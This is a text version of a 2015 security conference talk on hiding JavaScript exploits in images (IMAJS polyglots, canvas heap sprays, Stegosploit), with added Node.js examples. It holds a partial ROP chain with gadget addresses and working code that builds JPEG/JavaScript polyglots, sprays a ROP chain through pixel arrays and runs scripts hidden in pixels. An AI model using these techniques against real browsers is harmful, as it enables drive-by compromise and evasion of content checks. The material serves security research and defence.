
Hacking With Pictures
Saumil Shah
SyScan 2015
net-square

About Me
Saumil Shah
CEO, Net-Square
@therealsaumil
saumilshah
hacker, trainer, speaker, author, photographer
educating, entertaining and exasperating audiences since 1999

Hiding In Plain Sight

Images are INNOCENT!

A bit of History

Steganography
GIFAR: concatenation
PHP/ASP webshells: appending tags <?php..?> <%..%>
XSS in EXIF data

Dangerous Content Is ...Dangerous

(Diagram: Attack Payload; the decoder is marked SAFE, the pixel data is marked DANGEROUS)

(Figure: one set of bytes seen two ways, captioned "I'm an evil Javascript" and "I'm an innocent image")

(The slide shows the following exploit JavaScript rendered as pixels; reconstructed from the slide, which is cut off at the end.)

function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}
var addressof=new Array();
addressof["ropnop"]=0x6d81bdf0;
addressof["xchg_eax_esp_ret"]=0x6d81bdef;
addressof["pop_eax_ret"]=0x6d906744;
addressof["pop_ecx_ret"]=0x6d81cd57;
addressof["mov_peax_ecx_ret"]=0x6d979720;
addressof["mov_eax_pecx_ret"]=0x6d8d7be0;
addressof["mov_pecx_eax_ret"]=0x6d8eee01;
addressof["inc_eax_ret"]=0x6d838f54;
addressof["add_eax_4_ret"]=0x00000000;
addressof["call_peax_ret"]=0x6d8aec31;
addressof["add_esp_24_ret"]=0x00000000;
addressof["popad_ret"]=0x6d82a8a1;
addressof["call_peax"]=0x6d802597;
function call_ntallocatevirtualmemory(baseptr,size,callnum){
var ropnop=packv(addressof["ropnop"]);
var pop_eax_ret=packv(addressof["pop_eax_ret"]);
var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);
var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);
var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);
var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);
var call_peax_ret=packv(addressof["call_peax_ret"]);
var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);
var popad_ret=packv(addressof["popad_ret"]);
var retval=""

<CANVAS>

Avoid the EVIL eval()

Not this:   var a = eval(str);
But this:   a = (new Function(str))();

Hat tip: Dr. Mario Heiderich @0x6D6172696F

Theory Becomes Practice - 2014

Hiding In Plain Sight
IMAJS
I SEE PIXELS / I SEE CODE

IMAJS The Concept

<img> sees pixels
<script> sees code
#YourPointOfView

Image + Javascript = Holy Sh** Bipolar Content!

Cross Container Scripting - XCS

<img src="itsatrap.gif">
<script src="itsatrap.gif">
</script>


IMAJS-GIF Browser Support
(bytes after "GIF89a": 2f 2a 00 00, i.e. logical screen width 0x2a2f = "/*", height 0)

Browser/Viewer     Image renders?   Javascript executes?
Firefox            yes              yes
Safari             yes              yes
IE                 no               yes
Chrome             yes              yes
Opera
Preview.app        yes
XP Image Viewer    no
Win 7 Preview      yes

(Opera's cells did not survive extraction; the viewers have no Javascript column. These are 2015 results; browsers have since tightened MIME-type checks on <script src> responses, so re-test before relying on any row.)

IMAJS-BMP Browser Support
(bytes after "BM": 2f 2a 00 00, landing in the 4-byte file-size field)

Browser/Viewer     Image renders?   Javascript executes?
Firefox            yes              yes
Safari             yes              yes
IE                 yes              yes
Chrome             yes              yes
Opera              yes              yes
Preview.app        yes
XP Image Viewer    yes
Win 7 Preview      yes

Popular Image Formats

                BMP     GIF        PNG     JPG (Lossy)
IMAJS           Easy    Easy       Hard    Hard
Colours         RGB     Paletted   RGB     RGB
Extra Data                                 EXIF

(The slide's Alpha and <CANVAS> rows, and the cells "?", "(00 in header)", "Yes", "No", "Yes", "Yes", lost their column positions in extraction.)

All new IMAJS-JPG!

JPG + JS + HTML + CSS

Hat tip: Michal Zalewski @lcamtuf

The Secret Sauce
shhh.. don't tell anyone

Regular JPEG Header
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 FF E2 ...
FF D8 = start marker, FF E0 = APP0 marker, 00 10 = segment length (16, counting the two length bytes), 4A 46 49 46 00 = "J F I F \0", then the JFIF version/density/thumbnail fields 01 01 01 01 2C 01 2C 00 00, then FF E2 = next section...

Modified JPEG Header
FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 41 41 41 41 41...12074..41 41 41 FF E2 ...
Same start marker and "J F I F \0", but the length is now 2F 2A (12074), so the decoder skips a whole lot of extra space before the next section!

See the difference?
FF D8 FF E0 = start marker
2F 2A = length to the JPEG decoder, but "/*" to a Javascript parser: a comment!
4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 */='';alert(Date());/*...41 41 41 FF E2 ...
Javascript goes here, inside the padded APP0 segment; the next section follows the padding.
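The two views of one file (the "<img> sees pixels, <script> sees code" idea of the XCS slide and the APP0-length trick of the Secret Sauce slides), as an added Node.js example that is not the deck's own code. The JFIF fields are the ones on the slide; the payload, the 0x41 filler and the short trailing "image" (one APP2 segment plus EOI, standing in for the real DQT/SOF/DHT/SOS segments) are constructed here so the script runs offline. The payload writes a global instead of calling alert().

```javascript
// Added example: JPEG/JavaScript polyglot built with the APP0 length = "/*" trick.

const JFIF_BODY = Buffer.from([
  0x4a, 0x46, 0x49, 0x46, 0x00, // "JFIF\0"
  0x01, 0x01,                   // JFIF version 1.1
  0x01,                         // density units: dots per inch
  0x01, 0x2c, 0x01, 0x2c,       // X and Y density, 300 x 300
  0x00, 0x00,                   // no embedded thumbnail
]);

// Constructed stand-in for the rest of the file: an APP2 segment carrying two bytes,
// then the EOI marker. Must not contain "*/" or the script view would break early.
const IMAGE_REST = Buffer.from([0xff, 0xe2, 0x00, 0x04, 0x42, 0x42, 0xff, 0xd9]);

// Closes the comment opened by the length bytes, finishes the assignment to the
// identifier formed by the SOI/APP0 bytes, runs, then opens a comment that swallows
// the remainder of the file.
const PAYLOAD = "*/='';globalThis.imajsResult=Date();/*";

function buildPolyglot(payload, imageRest) {
  const app0Len = 0x2f2a;                       // "/*" read as a big-endian length: 12074
  const js = Buffer.from(payload, 'latin1');
  const room = app0Len - 2 - JFIF_BODY.length;  // bytes left in APP0 after the JFIF fields
  if (js.length > room) throw new Error('payload does not fit in the APP0 segment');
  if (imageRest.includes('*/')) throw new Error('image body would close the comment early');
  return Buffer.concat([
    Buffer.from([0xff, 0xd8]),             // SOI
    Buffer.from([0xff, 0xe0, 0x2f, 0x2a]), // APP0 marker + length "/*"
    JFIF_BODY,
    js,
    Buffer.alloc(room - js.length, 0x41),  // the 0x41 padding from the slide
    imageRest,
    Buffer.from('*/', 'latin1'),           // after EOI: image decoders ignore trailing bytes
  ]);
}

// JPEG view: walk the marker segments. Entropy-coded data after SOS (FF DA) is not
// length-prefixed, so a header walker stops there; EOI (FF D9) ends the walk.
function walkSegments(buf) {
  if (buf.readUInt16BE(0) !== 0xffd8) throw new Error('missing SOI');
  const segments = [];
  let off = 2;
  while (off + 1 < buf.length) {
    if (buf[off] !== 0xff) throw new Error('expected marker at offset ' + off);
    const marker = buf[off + 1];
    if (marker === 0xd9) { segments.push({ marker, off, len: 0 }); break; }
    const len = buf.readUInt16BE(off + 2);
    segments.push({ marker, off, len });
    if (marker === 0xda) break;
    off += 2 + len;
  }
  return segments;
}

// Script view. ISO-8859-1 maps every byte to one code point, so FF D8 FF E0 becomes
// "ÿØÿà", a legal JavaScript identifier; decoded as UTF-8 those bytes would turn into
// replacement characters and the script would not parse. A page loading this file via
// <script src> therefore needs that charset.
function runAsScript(buf) {
  const src = buf.toString('latin1');
  delete globalThis.imajsResult;
  new Function(src)();                  // sloppy mode: "ÿØÿà=''" creates a global
  return globalThis.imajsResult;
}

// Stand-alone run: the same buffer, both ways.
const poly = buildPolyglot(PAYLOAD, IMAGE_REST);
console.log(walkSegments(poly).map(s => 'FF' + s.marker.toString(16).toUpperCase() + ' len ' + s.len));
console.log('script view ran, result:', runAsScript(poly));
```

Two checks worth keeping from this: scan the image body for a stray "*/" before shipping, because compressed scan data can contain it by chance, and remember that the charset of the embedding page decides whether the leading marker bytes are an identifier or garbage.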

HTML5 for Exploit Dev

jscript9.dll introduced many changes.
No %u0000 in strings.
No 0x00000000 in strings.
Kills conventional heap sprays.

<CANVAS> to the rescue!
IE9 and above "support" HTML5 (<!DOCTYPE html>).

CANVAS for Exploit Dev

Heap sprays through pixel arrays!
No character restrictions.
All pixels treated equally!
And a bonus... ALPHA CHANNELS.
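The string packer from the "evil Javascript" slide next to a pixel-array spray of the kind the CANVAS slides describe, as an added Node.js example rather than the deck's code. Node has no <canvas>, so the Uint8ClampedArray below stands in for ctx.createImageData(width, height).data, which has the same element type and RGBA byte layout; the gadget addresses are copied from the deck's table and the image size is arbitrary.

```javascript
// Added example: string spray vs pixel-array spray for a ROP chain.

// Addresses from the deck's table. The 0x00000000 entry is exactly the kind of DWORD
// the slides say a jscript9 string spray cannot carry.
const CHAIN = [
  0x6d81bdf0, // ropnop
  0x6d906744, // pop eax; ret
  0x00000000, // add esp,24; ret (left unresolved in the deck)
  0x6d82a8a1, // popad; ret
];

// String packer as on the slide: one 32-bit value becomes two UTF-16 code units,
// low half first, so the string lays the DWORD out little-endian in memory.
function packv(n) {
  let s = (n >>> 0).toString(16);
  while (s.length < 8) s = '0' + s;
  return unescape('%u' + s.substring(4, 8) + '%u' + s.substring(0, 4));
}

// A %u0000 unit is what the jscript9 restriction on the slide rules out.
function hasNulUnit(str) {
  return str.includes('\u0000');
}

// Pixel spray: repeat the chain little-endian across the whole RGBA buffer so that
// any DWORD-aligned landing point inside the image hits the chain at some phase.
// Bytes are written raw; alpha is just the fourth byte of each DWORD here.
function sprayPixels(chain, width, height) {
  const pixels = new Uint8ClampedArray(width * height * 4);
  const view = new DataView(pixels.buffer);
  for (let off = 0; off + 4 <= pixels.length; off += 4) {
    view.setUint32(off, chain[(off / 4) % chain.length] >>> 0, true);
  }
  return pixels;
}

// What a stack pivot landing at `offset` inside the pixel buffer would read.
function dwordAt(pixels, offset) {
  return new DataView(pixels.buffer, pixels.byteOffset, pixels.byteLength).getUint32(offset, true);
}

// Stand-alone run: the string packer drops out for the zero entry, the pixel
// buffer does not care.
for (const a of CHAIN) {
  console.log(a.toString(16).padStart(8, '0'), 'string-packable:', !hasNulUnit(packv(a)));
}
const px = sprayPixels(CHAIN, 64, 64);
console.log('DWORD at 0x100:', dwordAt(px, 0x100).toString(16));
```

In a browser the buffer only stays resident while the ImageData object is referenced, so a spray keeps the objects in an array; and if the pixels are pushed through putImageData/getImageData rather than kept as the raw array, non-opaque alpha values let the canvas premultiply and alter the RGB bytes, which is the reason stego encoders keep alpha at 255.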

Stegosploit!

MS14-035 CInput Use-After-Free
IMAJS + stego = PWN!

< PAYLOADS GO back in time

< ATTACK TIMELINE

OCT 2014 - "I'M IN UR BASE"
  GET /lolcat.png -> 200 OK
  JS exploit code encoded in PNG. (EVIL)

FEB 2015 - "....KILLING UR DOODZ"
  GET /decoder.jpg -> 200 OK
  GET /lolcat.png -> 304 Not Modified
  Decoder script references the PNG from cache. (SAFE)
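The stego half of the timeline (exploit bytes hidden in the PNG's pixels, recovered later by a decoder script that uses new Function() as the "Avoid the EVIL eval()" slide suggests), as an added Node.js example that is not the deck's decoder. Node has no canvas, so the RGBA buffer built here stands in for the ImageData.data a decoder page would get from drawing the cached PNG to a <canvas> and calling getImageData. The container layout (one bit per colour channel, a 32-bit big-endian length prefix, alpha untouched) and the pseudo-random cover image are this example's own choices.

```javascript
// Added example: LSB stego of a script into RGB pixels, and a decoder that runs it.

// Deterministic cover image, alpha fixed at 255 so a canvas round trip cannot
// premultiply and disturb the RGB bytes that carry the payload.
function makeCover(width, height, seed = 1) {
  const px = new Uint8ClampedArray(width * height * 4);
  let s = seed >>> 0;
  for (let i = 0; i < px.length; i++) {
    if (i % 4 === 3) { px[i] = 255; continue; }
    s = (Math.imul(s, 1664525) + 1013904223) >>> 0;   // LCG, good enough for a cover
    px[i] = s >>> 24;
  }
  return px;
}

// Hide payload bytes in the low bit of R, G and B of consecutive pixels, MSB first,
// preceded by a 4-byte big-endian length. Mutates and returns `pixels`.
function encodeLsb(pixels, payload) {
  const bits = [];
  const header = [payload.length >>> 24, (payload.length >>> 16) & 0xff,
                  (payload.length >>> 8) & 0xff, payload.length & 0xff];
  for (const b of [...header, ...payload]) {
    for (let i = 7; i >= 0; i--) bits.push((b >> i) & 1);
  }
  const capacity = (pixels.length / 4) * 3;
  if (bits.length > capacity) throw new Error('payload too large for this image');
  let bi = 0;
  for (let p = 0; p < pixels.length && bi < bits.length; p += 4) {
    for (let c = 0; c < 3 && bi < bits.length; c++) {
      pixels[p + c] = (pixels[p + c] & 0xfe) | bits[bi++];
    }
  }
  return pixels;
}

// Decoder side: read the bits back in the same order.
function decodeLsb(pixels) {
  let p = 0, c = 0;
  const nextBit = () => {
    const bit = pixels[p + c] & 1;
    if (++c === 3) { c = 0; p += 4; }
    return bit;
  };
  const nextByte = () => { let v = 0; for (let i = 0; i < 8; i++) v = (v << 1) | nextBit(); return v; };
  let len = 0;
  for (let i = 0; i < 4; i++) len = ((len << 8) | nextByte()) >>> 0;
  if (len * 8 > (pixels.length / 4) * 3) throw new Error('length prefix exceeds image capacity');
  const out = new Uint8Array(len);
  for (let i = 0; i < len; i++) out[i] = nextByte();
  return out;
}

// What decoder.jpg would do with the cached PNG: recover the bytes and run them.
// new Function() rather than eval(): the payload gets no view of the decoder's locals.
function runDecoded(pixels) {
  const src = Buffer.from(decodeLsb(pixels)).toString('latin1');
  return new Function(src)();
}

// Largest per-channel change the embedding caused; 1 for an LSB scheme.
function maxChannelDelta(a, b) {
  let m = 0;
  for (let i = 0; i < a.length; i++) m = Math.max(m, Math.abs(a[i] - b[i]));
  return m;
}

// Stand-alone run with a harmless constructed payload.
const SCRIPT = Buffer.from("return 'pwned ' + (6 * 7);", 'latin1');
const cover = makeCover(64, 64);
const stego = encodeLsb(cover.slice(), SCRIPT);
console.log('max channel delta:', maxChannelDelta(cover, stego));
console.log('decoder result:', runDecoded(stego));
```

A lossless container is a precondition: this scheme survives PNG and BMP but not JPEG recompression, which is part of why the formats table marks JPG as hard. On the defensive side the timeline is the point: the PNG was fetched and cached months before the decoder arrived, so a detection window that only covers recent traffic never sees the two halves together.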

Conclusions - Offensive
Lots of possibilities!
Weird containers, weird encoding, weird obfuscation.
Image attacks emerging "in the wild".
Not limited to just browsers.

Conclusions - Defensive
DFIR nightmare: how far back does your window of inspection go?
Can't rely on extensions, file headers, MIME types or magic numbers.
Wake up call to browser-wallahs.

Greets!
Michal Zalewski @lcamtuf
Ange Albertini @corkami
@zer0mem
Mario Heiderich @0x6D6172696F
Thomas Lim @thomas_coseinc
@SyScan crew!

Photography by Saumil Shah

THE END
Saumil Shah
@therealsaumil
saumilshah
saumil@net-square.com

See you at
#SYSCAN16
#syscanmustnotdie
